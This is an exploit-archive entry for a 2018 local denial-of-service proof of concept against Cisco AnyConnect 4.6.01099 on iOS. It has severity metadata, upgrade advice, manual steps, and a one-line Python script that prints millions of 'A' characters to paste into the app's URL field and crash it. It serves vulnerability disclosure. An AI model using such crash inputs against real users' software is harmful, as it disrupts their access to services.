Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)

vendor:

AnyConnect Secure Mobility Client

by:

Luis Martinez

7.8

CVSS

HIGH

Denial of Service (DoS) Local

119

CWE

Product Name: AnyConnect Secure Mobility Client

Affected Version From: 4.6.01099

Affected Version To: 4.6.01099

Patch Exists: YES

Related CWE: N/A

CPE: a:cisco:anyconnect_secure_mobility_client

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: iPhone 7 iOS 11.4.1

2018

Cisco AnyConnect Secure Mobility Client 4.6.01099 – ‘Introducir URL’ Denial of Service (PoC)

The vulnerability exists due to a boundary error when processing user-supplied data, which can be exploited to cause a denial of service. An attacker can send a specially crafted request to trigger this vulnerability and crash the application.

Mitigation:

Upgrade to the latest version of Cisco AnyConnect Secure Mobility Client.

Source

Exploit-DB raw data:

# Exploit Title: Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-29
# Vendor Homepage: https://www.cisco.com/
# Software Link: App Store for iOS devices
# Tested Version: 4.6.01099
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Cisco_AnyConnect_Secure_Mobility_Client_4.6.01099.py
# 2.- Copy content to clipboard
# 3.- Open App Cisco AnyConnect Secure Mobility Client
# 4.- Diagnosticos
# 5.- Certificados
# 6.- Importar certificado de usuario...
# 7.- Paste ClipBoard on "Introducir URL"
# 8.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 12380000
print (buffer)